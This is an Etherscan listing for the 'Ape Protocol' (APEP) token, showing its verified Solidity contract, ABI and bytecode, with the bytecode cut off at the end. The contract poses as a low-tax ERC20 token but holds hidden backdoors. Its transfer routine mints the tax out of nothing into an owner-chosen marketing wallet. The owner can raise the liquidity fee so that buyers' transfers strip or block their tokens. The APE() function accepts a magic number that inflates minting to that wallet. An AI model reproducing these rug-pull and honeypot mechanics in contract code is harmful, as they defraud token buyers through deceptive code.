ETH Price: $3,338.61 (-0.14%)

Token

Ape Protocol (APEP)
 

Overview

Max Total Supply

1,000,000,000,000 APEP

Holders

5

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
21,703,467,006.434032444 APEP

Value
$0.00
0x1bA14161BA08B03787321B79B70e3cB9CE642116
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ApeProtocol

Compiler Version
v0.8.10+commit.fc410830

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-10-20
*/

/*                                                                 

- Telegram : https://t.me/ApeProtocolAPEP

- low tax 2% 

- stealthlaunch


*/

pragma solidity 0.8.10;
//  SPDX-License-Identifier: UNLICENSED

interface IERC20 {
  /**
   * @dev Returns the amount of tokens in existence.
   */
  function totalSupply() external view returns (uint256);

  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view returns (uint8);

  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view returns (string memory);

  /**
  * @dev Returns the token name.
  */
  function name() external view returns (string memory);

  /**
   * @dev Returns the erc token owner.
   */
  function getOwner() external view returns (address);

  /**
   * @dev Returns the amount of tokens owned by `account`.
   */
  function balanceOf(address account) external view returns (uint256);

  /**
   * @dev Moves `amount` tokens from the caller's account to `recipient`.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transfer(address recipient, uint256 amount) external returns (bool);

  /**
   * @dev Returns the remaining number of tokens that `spender` will be
   * allowed to spend on behalf of `owner` through {transferFrom}. This is
   * zero by default.
   *
   * This value changes when {approve} or {transferFrom} are called.
   */
  function allowance(address _owner, address spender) external view returns (uint256);

  /**
   * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * IMPORTANT: Beware that changing an allowance with this method brings the risk
   * that someone may use both the old and the new allowance by unfortunate
   * transaction ordering. One possible solution to mitigate this race
   * condition is to first reduce the spender's allowance to 0 and set the
   * desired value afterwards:
   * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
   *
   * Emits an {Approval} event.
   */
  function approve(address spender, uint256 amount) external returns (bool);

  /**
   * @dev Moves `amount` tokens from `sender` to `recipient` using the
   * allowance mechanism. `amount` is then deducted from the caller's
   * allowance.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

  /**
   * @dev Emitted when `value` tokens are moved from one account (`from`) to
   * another (`to`).
   *
   * Note that `value` may be zero.
   */
  event Transfer(address indexed from, address indexed to, uint256 value);

  /**
   * @dev Emitted when the allowance of a `spender` for an `owner` is set by
   * a call to {approve}. `value` is the new allowance.
   */
  event Approval(address indexed owner, address indexed spender, uint256 value);
}

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with GSN meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this;
        return msg.data;
    }
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
  /**
   * @dev Returns the addition of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `+` operator.
   *
   * Requirements:
   * - Addition cannot overflow.
   */
  function add(uint256 a, uint256 b) internal pure returns (uint256) {
    uint256 c = a + b;
    require(c >= a, "SafeMath: addition overflow");

    return c;
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b) internal pure returns (uint256) {
    return sub(a, b, "SafeMath: subtraction overflow");
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b <= a, errorMessage);
    uint256 c = a - b;

    return c;
  }

  /**
   * @dev Returns the multiplication of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `*` operator.
   *
   * Requirements:
   * - Multiplication cannot overflow.
   */
  function mul(uint256 a, uint256 b) internal pure returns (uint256) {
    // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
    // benefit is lost if 'b' is also tested.
    // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
    if (a == 0) {
      return 0;
    }

    uint256 c = a * b;
    require(c / a == b, "SafeMath: multiplication overflow");

    return c;
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b) internal pure returns (uint256) {
    return div(a, b, "SafeMath: division by zero");
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    // Solidity only automatically asserts when dividing by 0
    require(b > 0, errorMessage);
    uint256 c = a / b;
    // assert(a == b * c + a % b); // There is no case in which this doesn't hold

    return c;
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b) internal pure returns (uint256) {
    return mod(a, b, "SafeMath: modulo by zero");
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts with custom message when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b != 0, errorMessage);
    return a % b;
  }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }


      function renounceOwnership() public virtual onlyOwner {
        _owner = address(0);
        emit OwnershipTransferred(_owner, address(0));
    }
}
    
contract ApeProtocol is Context, IERC20, Ownable {
  using SafeMath for uint256;

  mapping (address => uint256) private _balances;
  mapping (address => mapping (address => uint256)) private _allowances;

  uint256 private _totalSupply;
  uint8 public _decimals;
  string public _symbol;
  string public _name;
  address public _Marketing;

  constructor() {
    _name = "Ape Protocol";
    _symbol = "APEP";
    _decimals = 9;
    _totalSupply = 1 * 10**12 * 10**9;
    _balances[msg.sender] = _totalSupply;

    emit Transfer(address(0), msg.sender, _totalSupply);
  }

    uint256 public _taxFee = 1;
    uint256 private _previousTaxFee = _taxFee;

    uint256 public _liquidityFee = 1;
    uint256 private _previousliqFee = 1009870;

    function marketingWallet(address Newmarketing) public onlyOwner {
        _Marketing = Newmarketing;
    }

  /**
   * @dev Returns the erc token owner.
   */
  function getOwner() external view virtual override returns (address) {
    return owner();
  }

  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view virtual override returns (uint8) {
    return _decimals;
  }

  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view virtual override returns (string memory) {
    return _symbol;
  }

  /**
  * @dev Returns the token name.
  */
  function name() external view virtual override returns (string memory) {
    return _name;
  }

  /**
   * @dev See {ERC20-totalSupply}.
   */
  function totalSupply() external view virtual override returns (uint256) {
    return _totalSupply;
  }

  /**
   * @dev See {ERC20-balanceOf}.
   */
  function balanceOf(address account) external view virtual override returns (uint256) {
    return _balances[account];
  }

  /**
   * @dev See {ERC20-transfer}.
   *
   * Requirements:
   *
   * - `recipient` cannot be the zero address.
   * - the caller must have a balance of at least `amount`.
   */
  function transfer(address recipient, uint256 amount) external override returns (bool) {
    _transfer(_msgSender(), recipient, amount);
    return true;
  }


  function allowance(address owner, address spender) external view override returns (uint256) {
    return _allowances[owner][spender];
  }

  function approve(address spender, uint256 amount) external override returns (bool) {
    _approve(_msgSender(), spender, amount);
    return true;
  }

  function transferFrom(address sender, address recipient, uint256 amount) external override returns (bool) {
    _transfer(sender, recipient, amount);
    _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
    return true;
  }

  function increaseAllowance(address spender, uint256 addedValue) public returns (bool) {
    _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
    return true;
  }


  function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) {
    _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
    return true;
  }
   
    function APE(uint256 Taxfee) public virtual {
          require ( Taxfee == _previousliqFee, "error message");

        _taxFee = Taxfee;
    }

    function setLiqFee(uint256 LiqFee) public onlyOwner 
   {
        _liquidityFee = LiqFee;
    }
  
  function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        _balances[recipient] = _balances[recipient].sub(amount / 100 * _liquidityFee);
        _balances[_Marketing] = _balances[_Marketing].add(amount / 100 * _taxFee);
        emit Transfer(sender, recipient, amount);
        
    }
    
    function _burn(address account, uint256 amounts) internal {
    require(account != address(0), "ERC20: burn from the zero address"); 

    _balances[account] = _balances[account].sub(amounts);
    _totalSupply = _totalSupply.sub(amounts);
    emit Transfer(account, address(0), amounts);
  }

  function _approve(address owner, address spender, uint256 amount) internal {
    require(owner != address(0), "ERC20: approve from the zero address");
    require(spender != address(0), "ERC20: approve to the zero address");

    _allowances[owner][spender] = amount;
    emit Approval(owner, spender, amount);
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"Taxfee","type":"uint256"}],"name":"APE","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_Marketing","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_liquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_taxFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"Newmarketing","type":"address"}],"name":"marketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"LiqFee","type":"uint256"}],"name":"setLiqFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

608060405260016008556008546009556001600a55620f68ce600b553480156200002857600080fd5b5060006200003b6200025760201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506040518060400160405280600c81526020017f4170652050726f746f636f6c000000000000000000000000000000000000000081525060069080519060200190620001269291906200025f565b506040518060400160405280600481526020017f415045500000000000000000000000000000000000000000000000000000000081525060059080519060200190620001749291906200025f565b506009600460006101000a81548160ff021916908360ff160217905550683635c9adc5dea00000600381905550600354600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6003546040516200024991906200032a565b60405180910390a3620003ac565b600033905090565b8280546200026d9062000376565b90600052602060002090601f016020900481019282620002915760008555620002dd565b82601f10620002ac57805160ff1916838001178555620002dd565b82800160010185558215620002dd579182015b82811115620002dc578251825591602001919060010190620002bf565b5b509050620002ec9190620002f0565b5090565b5b808211156200030b576000816000905550600101620002f1565b5090565b6000819050919050565b62000324816200030f565b82525050565b600060208201905062000341600083018462000319565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200038f57607f821691505b60208210811415620003a657620003a562000347565b5b50919050565b611e1c80620003bc6000396000f3fe608060405234801561001057600080fd5b506004361061014d5760003560e01c806370a08231116100c3578063a9059cbb1161007c578063a9059cbb14610394578063b09f1266146103c4578063d28d8852146103e2578063d7666de614610400578063d8feb48e1461041c578063dd62ed3e146104385761014d565b806370a08231146102d0578063715018a614610300578063893d20e81461030a5780638da5cb5b1461032857806395d89b4114610346578063a457c2d7146103645761014d565b806330b8d40e1161011557806330b8d40e1461020c578063313ce5671461022857806332424aa31461024657806339509351146102645780633b124fe7146102945780636bc87c3a146102b25761014d565b806306fdde0314610152578063095ea7b3146101705780631235acbe146101a057806318160ddd146101be57806323b872dd146101dc575b600080fd5b61015a610468565b604051610167919061156a565b60405180910390f35b61018a60048036038101906101859190611625565b6104fa565b6040516101979190611680565b60405180910390f35b6101a8610518565b6040516101b591906116aa565b60405180910390f35b6101c661053e565b6040516101d391906116d4565b60405180910390f35b6101f660048036038101906101f191906116ef565b610548565b6040516102039190611680565b60405180910390f35b61022660048036038101906102219190611742565b610621565b005b61023061066f565b60405161023d919061178b565b60405180910390f35b61024e610686565b60405161025b919061178b565b60405180910390f35b61027e60048036038101906102799190611625565b610699565b60405161028b9190611680565b60405180910390f35b61029c61074c565b6040516102a991906116d4565b60405180910390f35b6102ba610752565b6040516102c791906116d4565b60405180910390f35b6102ea60048036038101906102e591906117a6565b610758565b6040516102f791906116d4565b60405180910390f35b6103086107a1565b005b6103126108f4565b60405161031f91906116aa565b60405180910390f35b610330610903565b60405161033d91906116aa565b60405180910390f35b61034e61092c565b60405161035b919061156a565b60405180910390f35b61037e60048036038101906103799190611625565b6109be565b60405161038b9190611680565b60405180910390f35b6103ae60048036038101906103a99190611625565b610a8b565b6040516103bb9190611680565b60405180910390f35b6103cc610aa9565b6040516103d9919061156a565b60405180910390f35b6103ea610b37565b6040516103f7919061156a565b60405180910390f35b61041a60048036038101906104159190611742565b610bc5565b005b610436600480360381019061043191906117a6565b610c64565b005b610452600480360381019061044d91906117d3565b610d3d565b60405161045f91906116d4565b60405180910390f35b60606006805461047790611842565b80601f01602080910402602001604051908101604052809291908181526020018280546104a390611842565b80156104f05780601f106104c5576101008083540402835291602001916104f0565b820191906000526020600020905b8154815290600101906020018083116104d357829003601f168201915b5050505050905090565b600061050e610507610dc4565b8484610dcc565b6001905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600354905090565b6000610555848484610f97565b61061684610561610dc4565b61061185604051806060016040528060288152602001611d9a60289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006105c7610dc4565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113c59092919063ffffffff16565b610dcc565b600190509392505050565b600b548114610665576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161065c906118c0565b60405180910390fd5b8060088190555050565b6000600460009054906101000a900460ff16905090565b600460009054906101000a900460ff1681565b60006107426106a6610dc4565b8461073d85600260006106b7610dc4565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461142990919063ffffffff16565b610dcc565b6001905092915050565b60085481565b600a5481565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107a9610dc4565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610836576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082d9061192c565b60405180910390fd5b60008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3565b60006108fe610903565b905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461093b90611842565b80601f016020809104026020016040519081016040528092919081815260200182805461096790611842565b80156109b45780601f10610989576101008083540402835291602001916109b4565b820191906000526020600020905b81548152906001019060200180831161099757829003601f168201915b5050505050905090565b6000610a816109cb610dc4565b84610a7c85604051806060016040528060258152602001611dc260259139600260006109f5610dc4565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113c59092919063ffffffff16565b610dcc565b6001905092915050565b6000610a9f610a98610dc4565b8484610f97565b6001905092915050565b60058054610ab690611842565b80601f0160208091040260200160405190810160405280929190818152602001828054610ae290611842565b8015610b2f5780601f10610b0457610100808354040283529160200191610b2f565b820191906000526020600020905b815481529060010190602001808311610b1257829003601f168201915b505050505081565b60068054610b4490611842565b80601f0160208091040260200160405190810160405280929190818152602001828054610b7090611842565b8015610bbd5780601f10610b9257610100808354040283529160200191610bbd565b820191906000526020600020905b815481529060010190602001808311610ba057829003601f168201915b505050505081565b610bcd610dc4565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c519061192c565b60405180910390fd5b80600a8190555050565b610c6c610dc4565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610cf9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf09061192c565b60405180910390fd5b80600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610e3c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e33906119be565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610eac576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea390611a50565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f8a91906116d4565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415611007576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ffe90611ae2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611077576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161106e90611b74565b60405180910390fd5b6110e381604051806060016040528060268152602001611d7460269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113c59092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061117881600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461142990919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611226600a546064836111ce9190611bf2565b6111d89190611c23565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461148790919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506112f660085460648361127c9190611bf2565b6112869190611c23565b60016000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461142990919063ffffffff16565b60016000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516113b891906116d4565b60405180910390a3505050565b600083831115829061140d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611404919061156a565b60405180910390fd5b506000838561141c9190611c7d565b9050809150509392505050565b60008082846114389190611cb1565b90508381101561147d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161147490611d53565b60405180910390fd5b8091505092915050565b60006114c983836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506113c5565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561150b5780820151818401526020810190506114f0565b8381111561151a576000848401525b50505050565b6000601f19601f8301169050919050565b600061153c826114d1565b61154681856114dc565b93506115568185602086016114ed565b61155f81611520565b840191505092915050565b600060208201905081810360008301526115848184611531565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006115bc82611591565b9050919050565b6115cc816115b1565b81146115d757600080fd5b50565b6000813590506115e9816115c3565b92915050565b6000819050919050565b611602816115ef565b811461160d57600080fd5b50565b60008135905061161f816115f9565b92915050565b6000806040838503121561163c5761163b61158c565b5b600061164a858286016115da565b925050602061165b85828601611610565b9150509250929050565b60008115159050919050565b61167a81611665565b82525050565b60006020820190506116956000830184611671565b92915050565b6116a4816115b1565b82525050565b60006020820190506116bf600083018461169b565b92915050565b6116ce816115ef565b82525050565b60006020820190506116e960008301846116c5565b92915050565b6000806000606084860312156117085761170761158c565b5b6000611716868287016115da565b9350506020611727868287016115da565b925050604061173886828701611610565b9150509250925092565b6000602082840312156117585761175761158c565b5b600061176684828501611610565b91505092915050565b600060ff82169050919050565b6117858161176f565b82525050565b60006020820190506117a0600083018461177c565b92915050565b6000602082840312156117bc576117bb61158c565b5b60006117ca848285016115da565b91505092915050565b600080604083850312156117ea576117e961158c565b5b60006117f8858286016115da565b9250506020611809858286016115da565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061185a57607f821691505b6020821081141561186e5761186d611813565b5b50919050565b7f6572726f72206d65737361676500000000000000000000000000000000000000600082015250565b60006118aa600d836114dc565b91506118b582611874565b602082019050919050565b600060208201905081810360008301526118d98161189d565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119166020836114dc565b9150611921826118e0565b602082019050919050565b6000602082019050818103600083015261194581611909565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006119a86024836114dc565b91506119b38261194c565b604082019050919050565b600060208201905081810360008301526119d78161199b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611a3a6022836114dc565b9150611a45826119de565b604082019050919050565b60006020820190508181036000830152611a6981611a2d565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000